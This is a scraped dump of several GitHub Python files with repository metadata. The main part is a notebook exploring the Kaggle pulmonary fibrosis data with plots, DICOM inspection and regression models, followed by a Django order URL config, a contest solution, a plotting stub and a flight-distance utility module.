] | cristina.caballero2406@gmail.com |
a47a860993c205588ad7942665c79c7af1f7846f | ee5f91fdc5d63cb1668185de611e5d0e363a006f | /Untitled1.py | ada39f951b0541519b131fe64018622e6177ad55 | [] | no_license | vikram-sreedhar/Pulmonary-Fibrosis | 38b9f020049e3fab197556a2f6b4fa71e9b6fe9b | 267f1d041f61cf86892c94aa946b89eac2b9f60b | refs/heads/master | 2022-12-17T06:21:44.062236 | 2020-09-27T20:01:13 | 2020-09-27T20:01:13 | 299,106,153 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,383 | py | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import os
# In[2]:
# Visualisation libraries
import matplotlib.pyplot as plt
# In[3]:
import seaborn as sns
sns.set()
from plotly.offline import init_notebook_mode, iplot
import plotly.graph_objs as go
import plotly.offline as py
import pycountry
py.init_notebook_mode(connected=True)
import folium
from folium import plugins
# Graphics in retina format
get_ipython().run_line_magic('config', "InlineBackend.figure_format = 'retina'")
# Increase the default plot size and set the color scheme
plt.rcParams['figure.figsize'] = 8, 5
#plt.rcParams['image.cmap'] = 'viridis'
# palette colors to be used for plots
colors = ["steelblue","dodgerblue","lightskyblue","powderblue","cyan","deepskyblue","cyan","darkturquoise","paleturquoise","turquoise"]
# Disable warnings in Anaconda
import warnings
warnings.filterwarnings('ignore')
# In[4]:
from pathlib import Path
# In[5]:
from IPython.display import YouTubeVideo
YouTubeVideo('1Kyo9Hcyiq0', width=800, height=300)
# In[6]:
get_ipython().run_line_magic('pwd', '')
# In[7]:
os.chdir('D:\Kaggle\Pulmonary Fibrosis')
# In[8]:
get_ipython().run_line_magic('pwd', '')
# In[9]:
## Reading input and directory path
train = pd.read_csv('train.csv')
dataset_dir = 'D:\\Kaggle\\Pulmonary Fibrosis\\train'
# In[10]:
train
# In[95]:
test = pd.read_csv('test.csv')
# In[96]:
test
# In[13]:
## Reading test and train data
print('Train:\n',train.head(5),'\n')
print(train.isna().sum())
print('\n---------------------------------------------------------------------------\n')
print('Test:\n',test.head(5),'\n')
print(test.isna().sum())
# In[14]:
train.info()
# In[15]:
train.describe()
# In[16]:
dataset_dir
# In[17]:
train.shape[0]
# In[18]:
test.shape[0]
# In[19]:
INPUT = Path("D:/Kaggle/Pulmonary Fibrosis/train")
# In[20]:
INPUT
# In[21]:
train.Patient.agg(['nunique','count'])
# In[22]:
test.Patient.agg(['nunique','count'])
# In[23]:
fig, ax = plt.subplots(1,2,figsize=(20,5))
sns.countplot(train.Sex, palette="Reds_r", ax=ax[0]);
ax[0].set_xlabel("")
ax[0].set_title("Gender counts");
sns.countplot(test.Sex, palette="Blues_r", ax=ax[1]);
ax[1].set_xlabel("")
ax[1].set_title("Gender counts");
# In[24]:
get_ipython().run_line_magic('matplotlib', 'inline')
# In[25]:
fig, axs = plt.subplots(ncols=3)
fig.set_size_inches(19,6)
sns.countplot(train['SmokingStatus'],ax=axs[0])
sns.countplot(train['SmokingStatus'][train['Sex']=="Male"],ax=axs[1])
sns.countplot(train['SmokingStatus'][train['Sex']=="Female"],ax=axs[2])
fig.savefig("output2.jpeg")
# In[26]:
# Select unique bio info for the patients
agg_train = train.groupby(by="Patient")[["Patient", "Age", "Sex", "SmokingStatus"]].first().reset_index(drop=True)
# Figure
f, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize = (16, 6))
a = sns.distplot(agg_train["Age"], ax=ax1, hist=False, kde_kws=dict(lw=6, ls="--"))
b = sns.countplot(agg_train["Sex"], ax=ax2)
c = sns.countplot(agg_train["SmokingStatus"], ax=ax3)
a.set_title("Patient Age Distribution", fontsize=16)
b.set_title("Sex Frequency", fontsize=16)
c.set_title("Smoking Status", fontsize=16);
# In[27]:
fig, axs = plt.subplots(ncols=3)
fig.set_size_inches(19,6)
sns.countplot(test['SmokingStatus'],ax=axs[0])
fig.savefig("output3.jpeg")
# In[28]:
fig, ax = plt.subplots()
fig.set_size_inches(11.7, 8.27)
sns.distplot(train.Age,kde=False,bins=80,color="k")
fig.savefig("output4.jpeg")
# In[29]:
fig, ax = plt.subplots()
fig.set_size_inches(11.7, 8.27)
sns.distplot(test.Age,kde=False,bins=80,color="k")
fig.savefig("output5.jpeg")
# In[30]:
print("Min FVC value: {:,}".format(train["FVC"].min()), "\n" +
"Max FVC value: {:,}".format(train["FVC"].max()), "\n" +
"\n" +
"Min Percent value: {:.4}%".format(train["Percent"].min()), "\n" +
"Max Percent value: {:.4}%".format(train["Percent"].max()))
# Figure
f, (ax1, ax2) = plt.subplots(1, 2, figsize = (16, 6))
a = sns.distplot(train["FVC"], ax=ax1, hist=False, kde_kws=dict(lw=6, ls="--"))
b = sns.distplot(train["Percent"], ax=ax2, hist=False, kde_kws=dict(lw=6, ls="-."))
a.set_title("FVC Distribution", fontsize=16)
b.set_title("Percent Distribution", fontsize=16);
# In[31]:
print("Minimum no. weeks before CT: {}".format(train['Weeks'].min()), "\n" +
"Maximum no. weeks after CT: {}".format(train['Weeks'].max()))
plt.figure(figsize = (16, 6))
a = sns.distplot(train['Weeks'], hist=False, kde_kws=dict(lw=8, ls="--"))
plt.title("Number of weeks before/after the CT scan", fontsize = 16)
plt.xlabel("Weeks", fontsize=14);
# In[32]:
def create_baseline():
first_scan=pd.DataFrame()
for i in train.Patient.unique():
first_scan=first_scan.append((train[train['Patient']=="{}".format(i)][:1]))
first_scan=first_scan.drop("Patient",axis=1)
first_scan=first_scan.drop("Weeks",axis=1)
return first_scan
fc=create_baseline()
fc=fc.reset_index(drop=True)
fc.head()
# In[33]:
fc
# In[34]:
(sns.pairplot(train,hue="SmokingStatus",height=4)).savefig("output5.jpeg")
# In[35]:
sns.pairplot(fc,hue="SmokingStatus",height=4).savefig("output6.jpeg")
# In[36]:
fig, ax = plt.subplots(nrows=2)
fig.set_size_inches(22, 8.27)
sns.lineplot(x='Weeks',y='Percent',data=train,ax=ax[0]).set_title("All Patients Percent trend",fontsize=15,y=0.85)
sns.lineplot(x='Weeks',y='FVC',data=train,ax=ax[1]).set_title("All Patients FVC trend",fontsize=15,y=0.85)
fig.savefig("weeksfvccomp.jpeg")
# In[37]:
# FVC and Percent trend Males vs Females
males=train[train["Sex"]=="Male"]
females=train[train["Sex"]=="Female"]
# In[38]:
fig, ax = plt.subplots(nrows=4)
fig.set_size_inches(22, 22)
sns.lineplot(x='Weeks',y='FVC',data=males,ax=ax[0]).set_title("MALES FVC TREND", fontsize=15,y=0.85)
sns.lineplot(x='Weeks',y='FVC',data=females,ax=ax[1]).set_title("FEMALES FVC TREND", fontsize=15,y=0.85)
sns.lineplot(x='Weeks',y='Percent',data=males,ax=ax[2]).set_title("MALES PERCENT TREND", fontsize=15,y=0.85)
sns.lineplot(x='Weeks',y='Percent',data=females,ax=ax[3]).set_title("FEMALES PERCENT TREND", fontsize=15,y=0.85)
fig.savefig("malevsfemalesfvc_percenttrend.jpeg")
# In[39]:
# FVC and Percent trend Smokers vs nonsmokers for all patients
smoker=train[train["SmokingStatus"]=="Ex-smoker"]
never_smoked=train[train["SmokingStatus"]=="Never smoked"]
current_smoker=train[train["SmokingStatus"]=="Currently smokes"]
# In[40]:
fig, ax = plt.subplots(nrows=6)
fig.set_size_inches(22, 35)
sns.lineplot(x='Weeks',y='FVC',data=smoker,ax=ax[0]).set_title("EX SMOKER FVC TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='FVC',data=never_smoked,ax=ax[1]).set_title("NON SMOKER FVC TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='FVC',data=current_smoker,ax=ax[2]).set_title("SMOKER FVC TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='Percent',data=smoker,ax=ax[3]).set_title("EX SMOKER PERCENT TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='Percent',data=never_smoked,ax=ax[4]).set_title("NON SMOKER PERCENT TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='Percent',data=current_smoker,ax=ax[5]).set_title("SMOKER PERCENT TREND",fontsize=15,y=0.90)
fig.savefig("weeksvpercent_smokervsnonsmoker.jpeg")
# In[41]:
# creating Age-Bins in train data
category = pd.cut(train.Age,bins = [49,55,65,75,85,120],labels=['<=55','56-65','66-75','76-85','85+'])
train.insert(5,'Age_Bins',category)
# In[42]:
f, (ax1, ax2) = plt.subplots(1,2, figsize = (16, 6))
a = sns.barplot(x = train["SmokingStatus"], y = train["FVC"], ax=ax1)
b = sns.barplot(x = train["SmokingStatus"], y = train["Percent"], ax=ax2)
a.set_title("Mean FVC per Smoking Status", fontsize=16)
b.set_title("Mean Perc per Smoking Status", fontsize=16);
# In[43]:
f, (ax1, ax2) = plt.subplots(1,2, figsize = (16, 6))
a = sns.barplot(x = train["Age_Bins"], y = train["FVC"], hue = train["Sex"], ax=ax1)
b = sns.barplot(x = train["Age_Bins"], y = train["Percent"], hue = train["Sex"], ax=ax2)
a.set_title("Mean FVC per Gender per Age category", fontsize=16)
b.set_title("Mean Perc per Gender per Age Category", fontsize=16);
# In[44]:
f, (ax1, ax2) = plt.subplots(1,2, figsize = (16, 6))
a = sns.barplot(x = train["Age_Bins"], y = train["FVC"], hue = train["SmokingStatus"], ax=ax1)
b = sns.barplot(x = train["Age_Bins"], y = train["Percent"], hue = train["SmokingStatus"], ax=ax2)
a.set_title("Mean FVC per Smoking_status per Age category", fontsize=16)
b.set_title("Mean Perc per Smoking_status per Age Category", fontsize=16);
# In[45]:
plt.figure(figsize=(16,10))
sns.heatmap(train.corr(),annot=True)
# In[46]:
import scipy
# In[47]:
# Compute Correlation
corr1, _ = scipy.stats.pearsonr(train["FVC"], train["Percent"])
corr2, _ = scipy.stats.pearsonr(train["FVC"], train["Age"])
corr3, _ = scipy.stats.pearsonr(train["Percent"], train["Age"])
print("Pearson Corr FVC x Percent: {:.4}".format(corr1), "\n" +
"Pearson Corr FVC x Age: {:.0}".format(corr2), "\n" +
"Pearson Corr Percent x Age: {:.2}".format(corr3))
# In[48]:
train.describe()
# In[49]:
train.info()
# In[50]:
# creating Age-Bins in fc data
category = pd.cut(fc.Age,bins = [49,55,65,75,85,120],labels=['<=55','56-65','66-75','76-85','85+'])
fc.insert(5,'Age_Bins',category)
# In[51]:
fc.info()
# In[52]:
fc.describe()
# In[53]:
f, (ax1, ax2) = plt.subplots(1,2, figsize = (16, 6))
a = sns.barplot(x = fc["Age_Bins"], y = fc["FVC"], hue = fc["SmokingStatus"], ax=ax1)
b = sns.barplot(x = fc["Age_Bins"], y = fc["Percent"], hue = fc["SmokingStatus"], ax=ax2)
a.set_title("Patient FVC per Smoking_status per Age category", fontsize=16)
b.set_title("Patinet Perc per Smoking_status per Age Category", fontsize=16);
# In[54]:
import pydicom
# In[55]:
import os
import json
from pathlib import Path
from glob import glob
# In[56]:
from fastai.basics import *
from fastai.vision.all import *
from fastai.data.transforms import *
from fastai.medical.imaging import *
import pydicom,kornia,skimage
# In[57]:
try:
import cv2
cv2.setNumThreads(0)
except: pass
import seaborn as sns
sns.set(style="whitegrid")
sns.set_context("paper")
# In[58]:
#Visulising Dicom Files
files = Path('D:/Kaggle/Pulmonary Fibrosis/train')
# In[59]:
train_files = get_dicom_files(files)
# In[60]:
train_files
# In[61]:
info_view = train_files[33025]
dimg = dcmread(info_view)
dimg
# In[62]:
#There are some 'key' aspects within the header:
#(0018, 0015) Body Part Examined CS: Chest: images are from the chest area
#(0020, 0013) Instance Number IS: "99": this is the same as the .dcm image file
#(0020, 0032) Image Position (Patient) DS: [-191, -29, -241.200012]: represents the x, y and z positions
#(0020, 0037) Image Orientation (Patient) DS: [1, 0, 0, 0, 1, 0]: This is 6 values that represent two
#normalized 3D vectors(in this case directions) where the first vector [1,0,0] represents Xx, Xy, Xz and the
#second vector [0,1,0] that represents Yx, Yy, Yz.
#(0028, 0004) Photometric Interpretation CS: MONOCHROME2: aka the colorspace, images are being stored
#as low values=dark, high values=bright. If the colorspace was MONOCHROME then the low values=bright and high values=dark.
#(0028, 0100) Bits Allocated US: 16: each image is 16 bits
#(0028, 1050) Window Center DS: "-500.0" : aka Brightness
#(0028, 1051) Window Width DS: "-1500.0" : aka Contrast
#(0028, 1052) Rescale Intercept DS: "-1024.0" and (0028, 1053) Rescale Slope DS: "1.0":
#The Rescale Intercept and Rescale Slope are applied to transform the pixel values of the image into values that
#are meaningful to the application. It's importance is explained further in the kernel.
#(7fe0, 0010) Pixel Data OW: Array of 524288 elements: the image pixel data that pydicom uses to convert the pixel data
#into an image.
#This can be calculated by this formula:
#Array of elements = Rows X Columns X Number of frames X Samples per pixel X (bits_allocated/8)
#so in this example it would be 512 X 512 X 1 X 1 X (16/8) = 524288
# In[63]:
dimg.PixelData[:33025]
# In[218]:
dimg.pixel_array
# In[64]:
dimg.pixel_array.shape
# In[65]:
dimg.show()
# In[66]:
import pydicom as dicom
import PIL # optional
import pandas as pd
import matplotlib.pyplot as plt
# In[67]:
# Metdata of dicomfiles extracted as dataframe
df_dicom = pd.DataFrame.from_dicoms(train_files)
# In[68]:
df_dicom
# In[69]:
df_dicom.describe()
# In[70]:
df_dicom.info()
# In[71]:
df_dicom.head()
# In[72]:
get_ipython().run_line_magic('pwd', '')
# In[73]:
df_dicom.to_csv('df_dicom.csv')
# In[74]:
unique_patient_df = train.drop(['Weeks', 'FVC', 'Percent'], axis=1).drop_duplicates().reset_index(drop=True)
unique_patient_df['# visits'] = [train['Patient'].value_counts().loc[pid] for pid in unique_patient_df['Patient']]
print('Number of data points: ' + str(len(unique_patient_df)))
print('----------------------')
for col in unique_patient_df.columns:
print('{} : {} unique values, {} missing.'.format(col,
str(len(unique_patient_df[col].unique())),
str(unique_patient_df[col].isna().sum())))
unique_patient_df.head()
# In[75]:
#Convert to JPG and extracting all information in one go..
import pydicom as dicom
import matplotlib.pyplot as plt
import os
import cv2
import PIL # optional
import pandas as pd
import csv
# make it True if you want in PNG format
PNG = False
# Specify the .dcm folder path
folder_path = 'D:/Kaggle/Pulmonary Fibrosis/train/ID00007637202177411956430/'
# Specify the .jpg/.png folder path
jpg_folder_path = 'D:\Kaggle\Pulmonary Fibrosis\Train_wkg'
images_path = os.listdir(folder_path)
# In[76]:
arr=dimg.pixel_array
# In[77]:
arr
# In[78]:
df_arr = pd.DataFrame(arr)
# In[79]:
df_arr
# In[80]:
from glob import glob
# In[81]:
PATH_dicom = os.path.abspath(os.path.join('D:/Kaggle/Pulmonary Fibrosis', 'Train_jpg'))
# In[82]:
images_dicom = glob(os.path.join(PATH_dicom, "*.jpg"))
# In[83]:
images_dicom[0:5]
# In[84]:
images_dicom[0:5]
# In[85]:
r = random.sample(images_dicom, 3)
r
# In[86]:
plt.figure(figsize=(16,16))
plt.subplot(131)
plt.imshow(cv2.imread(r[0]))
plt.subplot(132)
plt.imshow(cv2.imread(r[1]))
plt.subplot(133)
plt.imshow(cv2.imread(r[2]));
# In[87]:
get_ipython().run_line_magic('pwd', '')
# In[88]:
submission = pd.read_csv('sample_submission.csv')
# In[89]:
train.drop_duplicates(keep=False, inplace=True, subset=['Patient','Weeks'])
# In[90]:
train
# In[91]:
submission
# In[92]:
submission['Patient'] = (
submission['Patient_Week']
.apply(
lambda x:x.split('_')[0]
)
)
submission['Weeks'] = (
submission['Patient_Week']
.apply(
lambda x: int(x.split('_')[-1])
)
)
submission = submission[['Patient','Weeks','FVC', 'Confidence','Patient_Week']]
submission = submission.merge(test.drop('Weeks', axis=1), on="Patient")
# In[93]:
submission
# In[97]:
test
# In[98]:
train['Dataset'] = 'train'
test['Dataset'] = 'test'
submission['Dataset'] = 'submission'
# In[99]:
submission
# In[100]:
all_data = train.append([test, submission])
all_data = all_data.reset_index()
all_data = all_data.drop(columns=['index'])
# In[101]:
all_data.head()
# In[102]:
all_data['FirstWeek'] = all_data['Weeks']
all_data.loc[all_data.Dataset=='submission','FirstWeek'] = np.nan
all_data['FirstWeek'] = all_data.groupby('Patient')['FirstWeek'].transform('min')
# In[103]:
first_fvc = (
all_data
.loc[all_data.Weeks == all_data.FirstWeek][['Patient','FVC']]
.rename({'FVC': 'FirstFVC'}, axis=1)
.groupby('Patient')
.first()
.reset_index()
)
all_data = all_data.merge(first_fvc, on='Patient', how='left')
# In[104]:
all_data.head()
# In[105]:
all_data
# In[106]:
all_data['WeeksPassed'] = all_data['Weeks'] - all_data['FirstWeek']
# In[107]:
all_data
# In[108]:
#Calculating derived field of height from First FVC value
# Reference - https://en.wikipedia.org/wiki/Vital_capacity#:~:text=It%20is%20equal%20to%20the,a%20wet%20or%20regular%20spirometer
def calculate_height(row):
if row['Sex'] == 'Male':
return row['FirstFVC'] / (27.63 - 0.112 * row['Age'])
else:
return row['FirstFVC'] / (21.78 - 0.101 * row['Age'])
all_data['Height'] = all_data.apply(calculate_height, axis=1)
# In[109]:
all_data.head()
# In[110]:
all_data = pd.concat([
all_data,
pd.get_dummies(all_data.Sex),
pd.get_dummies(all_data.SmokingStatus)
], axis=1)
all_data = all_data.drop(columns=['Sex', 'SmokingStatus'])
# In[111]:
all_data.head()
# In[112]:
def scale_feature(series):
return (series - series.min()) / (series.max() - series.min())
all_data['Percent'] = scale_feature(all_data['Percent'])
all_data['Age'] = scale_feature(all_data['Age'])
all_data['FirstWeek'] = scale_feature(all_data['FirstWeek'])
all_data['FirstFVC'] = scale_feature(all_data['FirstFVC'])
all_data['WeeksPassed'] = scale_feature(all_data['WeeksPassed'])
all_data['Height'] = scale_feature(all_data['Height'])
# In[113]:
feature_columns = [
'Percent',
'Age',
'FirstWeek',
'FirstFVC',
'WeeksPassed',
'Height',
'Female',
'Male',
'Currently smokes',
'Ex-smoker',
'Never smoked',
]
# In[114]:
train_new = all_data.loc[all_data.Dataset == 'train']
test_new = all_data.loc[all_data.Dataset == 'test']
submission_new = all_data.loc[all_data.Dataset == 'submission']
# In[115]:
train_new[feature_columns].head()
# In[116]:
train_new
# In[117]:
import sklearn
from sklearn import linear_model
# In[118]:
model = linear_model.LinearRegression()
# In[119]:
model.fit(train_new[feature_columns], train_new['FVC'])
# In[120]:
plt.bar(train_new[feature_columns].columns.values, model.coef_)
plt.xticks(rotation=90)
plt.show()
# In[121]:
from sklearn import linear_model, ensemble
from sklearn.metrics import mean_squared_error, mean_absolute_error
# In[122]:
predictions = model.predict(train_new[feature_columns])
mse = mean_squared_error(
train['FVC'],
predictions,
squared=False
)
mae = mean_absolute_error(
train['FVC'],
predictions
)
print('MSE Loss: {0:.2f}'.format(mse))
print('MAE Loss: {0:.2f}'.format(mae))
# In[123]:
print (model.coef_)
# In[124]:
print (model.intercept_)
# In[125]:
# Rsquare value for the model
model.score(train_new[feature_columns], train_new['FVC'])
# In[126]:
X = train_new[feature_columns]
# In[127]:
Y = train_new['FVC']
# In[128]:
X
# In[129]:
import statsmodels.formula.api as smf
# In[130]:
model_smf_1 = smf.ols(formula='Y~X',data = train_new).fit()
# In[131]:
train_new['prediction'] = predictions
# In[132]:
predictions
# In[133]:
model_smf_1.params
# In[134]:
prediction_smf = model_smf_1.predict(train_new[feature_columns])
# In[135]:
model_smf_1.summary()
# In[136]:
prediction_smf
# In[137]:
predictions
# In[138]:
prds_1_sklearn = pd.DataFrame(predictions)
# In[139]:
prds_1_sklearn
# In[140]:
prds_2_statstools = pd.DataFrame(prediction_smf)
# In[141]:
prds_2_statstools
# In[142]:
plt.scatter(predictions, train_new['FVC'])
plt.xlabel('predictions')
plt.ylabel('FVC (labels)')
plt.show()
# In[143]:
delta = predictions - train_new['FVC']
plt.hist(delta, bins=20)
plt.show()
# In[144]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# In[145]:
train_patients = train_new.Patient.unique()
# In[146]:
fig, ax = plt.subplots(10, 1, figsize=(10, 20))
for i in range(10):
patient_log = train_new[train_new['Patient'] == train_patients[i]]
ax[i].set_title(train_patients[i])
ax[i].plot(patient_log['WeeksPassed'], patient_log['FVC'], label='truth')
ax[i].plot(patient_log['WeeksPassed'], patient_log['prediction'], label='prediction')
ax[i].legend()
# In[149]:
submission_new
train_new
# In[152]:
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestRegressor
from sklearn import metrics
get_ipython().run_line_magic('matplotlib', 'inline')
# In[153]:
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.3, random_state=0)
# In[154]:
#Create a Gaussian Classifier
regr=RandomForestRegressor(random_state=0)
#Train the model using the training sets Y_pred=clf.predict(X_test)
regr.fit(X_train,Y_train)
# In[155]:
regr.n_estimators
# In[156]:
regr.estimators_[5]
# In[157]:
regr.get_params()
# In[158]:
regr.feature_importances_
# In[162]:
Y_pred = regr.predict(X_test)
# In[163]:
df = pd.DataFrame({'Actual': Y_test, 'Predicted': Y_pred})
df
# In[164]:
df1 = df.head(50)
df1.plot(kind='bar',figsize=(16,10))
plt.grid(which='major', linestyle='-', linewidth='0.5', color='green')
plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.show()
# In[165]:
import os
os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'
# In[166]:
from sklearn.tree import export_graphviz
import pydot
# In[167]:
tree = regr.estimators_[5]
# In[168]:
export_graphviz(tree,out_file = 'tree.dot',
feature_names = X.columns,
filled = True,
rounded = True,precision = 1)
# In[169]:
(graph, ) = pydot.graph_from_dot_file('tree.dot')
# In[170]:
graph
# In[171]:
import os
os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'
# In[172]:
graph.write_png('tree_graph.png')
# In[173]:
errors_test = abs(Y_pred - Y_test)
# In[174]:
# Display the performance metrics
print('Mean Absolute Error:', round(np.mean(errors_test), 2), 'degrees.')
mape = np.mean(100 * (errors_test / Y_test))
accuracy = 100 - mape
print('Accuracy:', round(accuracy, 2), '%.')
# In[175]:
Y_pred_train=regr.predict(X_train)
# In[176]:
df2 = pd.DataFrame({'Actual': Y_train, 'Predicted': Y_pred_train})
df2
# In[177]:
df3 = df2.head(50)
df3.plot(kind='bar',figsize=(16,10))
plt.grid(which='major', linestyle='-', linewidth='0.5', color='green')
plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.show()
# In[178]:
errors_train = abs(Y_pred_train - Y_train)
# In[179]:
# Display the performance metrics
print('Mean Absolute Error:', round(np.mean(errors_train), 2), 'degrees.')
mape_train = np.mean(100 * (errors_train / Y_train))
accuracy_train = 100 - mape_train
print('Accuracy:', round(accuracy_train, 2), '%.')
# In[234]:
import cv2
import os
import random
import matplotlib.pylab as plt
from glob import glob
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
# In[248]:
files_jpg = Path('D:/Kaggle/Pulmonary Fibrosis/Train_jpg1')
# In[250]:
images_jpg = glob(os.path.join(files_jpg, "*.jpg"))
# In[249]:
files_jpg
# In[252]:
images_jpg
# In[253]:
r_jpg = random.sample(images_jpg, 3)
r_jpg
# Matplotlib black magic
plt.figure(figsize=(16,16))
plt.subplot(131)
plt.imshow(cv2.imread(r_jpg[0]))
plt.subplot(132)
plt.imshow(cv2.imread(r_jpg[1]))
plt.subplot(133)
plt.imshow(cv2.imread(r_jpg[2]));
# In[255]:
def proc_images():
"""
Returns two arrays:
x is an array of resized images
"""
x = [] # images as arrays
WIDTH = 64
HEIGHT = 64
for img in images_jpg:
base = os.path.basename(images_jpg)
# Read and resize image
full_size_image = cv2.imread(images_jpg)
x.append(cv2.resize(full_size_image, (WIDTH,HEIGHT), interpolation=cv2.INTER_CUBIC))
return x
# In[261]:
from PIL import Image
# In[267]:
IMG_DIR = 'D:/Kaggle/Pulmonary Fibrosis/Train_jpg1'
for img in os.listdir(IMG_DIR):
img_array = cv2.imread(os.path.join(IMG_DIR,img), cv2.IMREAD_GRAYSCALE)
img_array = (img_array.flatten())
img_array = img_array.reshape(-1, 1).T
print(img_array)
with open('output.csv', 'ab') as f:
np.savetxt(f, img_array, delimiter=",")
# In[281]:
img_array.shape
# In[279]:
os.listdir(IMG_DIR)
# In[278]:
img
# In[ ]:
| [
"noreply@github.com"
] | vikram-sreedhar.noreply@github.com |
b2d0b95a6c5ee67ad0f1af6a3d34aaa04e489b4c | 25297ce593e7b5d8c7035f5992fd38538e8a4b6d | /ecom/api/order/urls.py | 47d94c48d82bb40e3382f9a0b258f2eae19c2d76 | [] | no_license | abhishek0405/MaskBazaar | fb2d955ba1fc73a8719cf23b3318972ae7455b7c | 71975fc7ab930859786719579821f6100fe7981d | refs/heads/main | 2023-01-07T13:48:14.201049 | 2020-11-22T14:29:21 | 2020-11-22T14:29:21 | 315,051,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | from rest_framework import routers
from django.urls import path, include
from . import views
router = routers.DefaultRouter()
router.register(r'',views.OrderViewSet) #'' as this invoked only when /api/product so no need to add extra
urlpatterns =[
path('add/<str:id>/<str:token>',views.add,name='order.add'),
path('',include(router.urls))#the one defined above
] | [
"abhishekanantharam123@gmail.com"
] | abhishekanantharam123@gmail.com |
2a6ed3ab36186dc4b2907c6eccfff147841622dd | bc28f8fe941caf281261afa1641868e743ecb5ab | /Google_APAC_Round_E/Beautiful_Numbers/Beautiful_Numbers.py | 07ce6d570af05b0e1e80e6cd90d4524fcd142a89 | [] | no_license | anubhavshrimal/CompetitiveProgrammingInPython | 9fc6949fb3cd715cfa8544c17a63ffbe52677b37 | 2692c446d49ec62d4967ed78a7973400db7ce981 | refs/heads/master | 2021-07-05T08:17:15.182154 | 2018-05-29T02:26:25 | 2018-05-29T02:26:25 | 60,554,340 | 7 | 6 | null | 2021-05-24T17:46:16 | 2016-06-06T19:18:27 | Python | UTF-8 | Python | false | false | 465 | py | import numpy as np
test = int(input())
for t in range(1, test+1):
num = int(input())
n1, n2 = abs(np.roots([1, 1, -(num-1)]))
if int(n1) != n1 or int(n2)!= n2:
ans = num-1
else:
if n1 == 1 or n1 == -1:
ans = n2
elif n2 == 1 or n2 == -1:
ans = n1
else:
if n2 > n1:
ans = n1
else:
ans = n2
print('Case #'+str(t)+':',str(int(ans)))
| [
"anubhavshrimal@gmail.com"
] | anubhavshrimal@gmail.com |
923b0ab9979233ab582fe107d680fdaa2f83e04e | f6a639ad7782fa5e05905224e01aeefc7204a66f | /punto_2/animacion.py | 34e80f3465c84af1886dff168d53833977c71bf2 | [] | no_license | Angelicarjs/AngelicaMoreno_taller5 | 16b62ffd750f4ee1fb475e66be359cb63fd58441 | a0cb6164ee6f017f0c67004500d0f48b15e11ee3 | refs/heads/master | 2020-03-12T08:16:02.383897 | 2018-05-14T22:00:53 | 2018-05-14T22:00:53 | 130,523,842 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 271 | py | import numpy as np
import matplotlib.pyplot as plt
from matplotlib import animation
# Load the data: row 0 holds the x coordinates, row 1 the y coordinates.
data = np.loadtxt('cuerda.txt')
x = data[0,:]
y = data[1,:]
fig, ax = plt.subplots()
# Fixed x and y limits for the plot/animation frame.
ax.set_xlim(( 0, 100))
ax.set_ylim((-5, 1))
| [
"noreply@github.com"
] | Angelicarjs.noreply@github.com |
686ebbced947976bbb1149d1b104178043ff8612 | aafb41aab45562dfe08b2f142025a670dc4c5b80 | /scripts/ffhs-na-semesterarbeit/utils/utils.py | 376cc2c16a15cfccf108bd3c70e5d083df74c7b1 | [] | no_license | samuelblattner/ffhs-na-semesterarbeit | 1a61b55b60793557dd9b5d3b9ab025e8869fcbbd | c59d878806ab53fbc91b8861e820c1956f344fb3 | refs/heads/master | 2020-04-09T23:39:09.285217 | 2018-12-06T22:41:47 | 2018-12-06T22:41:47 | 160,662,796 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,179 | py | from random import random
from typing import Tuple, List, Dict
from dateutil import parser
# English names of European countries (immutable tuple).
EUROPEAN_COUNTRIES = (
    'Albania',
    'Andorra',
    'Austria',
    'Belarus',
    'Belgium',
    'Bosnia and Herzegovina',
    'Bulgaria',
    'Croatia',
    'Czech Republic',
    'Denmark',
    'Estonia',
    'Finland',
    'France',
    'Germany',
    'Greece',
    'Hungary',
    'Iceland',
    'Ireland',
    'Italy',
    'Latvia',
    'Liechtenstein',
    'Lithuania',
    'Luxembourg',
    'Malta',
    'Moldova',
    'Monaco',
    'Netherlands',
    'Norway',
    'Poland',
    'Portugal',
    'Romania',
    'Russia',
    'San Marino',
    'Serbia',
    'Slovakia',
    'Slovenia',
    'Spain',
    'Sweden',
    'Switzerland',
    'Ukraine',
    'United Kingdom',
)
import sys
from datetime import datetime, timedelta
from math import radians, atan2, sqrt, cos, sin
import networkx as nx
from dateutil.tz import gettz
def calculate_distance_from_coordinates(lat1, lng1, lat2, lng2, radius=6371.0):
    """Return the great-circle distance between two points, in kilometres.

    Uses the haversine formula on a spherical model.

    :param lat1: Latitude of the first point, in decimal degrees.
    :param lng1: Longitude of the first point, in decimal degrees.
    :param lat2: Latitude of the second point, in decimal degrees.
    :param lng2: Longitude of the second point, in decimal degrees.
    :param radius: Sphere radius in kilometres; defaults to the mean Earth
        radius (6371 km), so existing 4-argument callers are unaffected.
    :return: Surface distance in the same unit as ``radius``.
    """
    rad_lat1 = radians(lat1)
    rad_lng1 = radians(lng1)
    rad_lat2 = radians(lat2)
    rad_lng2 = radians(lng2)
    dlat = rad_lat2 - rad_lat1
    dlng = rad_lng2 - rad_lng1
    # Haversine term: squared half-chord length between the two points.
    a = (sin(dlat / 2) ** 2) + (cos(rad_lat1) * cos(rad_lat2)) * (sin(dlng / 2) ** 2)
    # Central angle; atan2 is numerically stable for antipodal points.
    c = 2 * atan2(sqrt(a), sqrt(1 - a))
    return radius * c
def calculate_flight_duration_per_distance(network: nx.MultiDiGraph):
    """Return the average flight duration per kilometre across all routes.

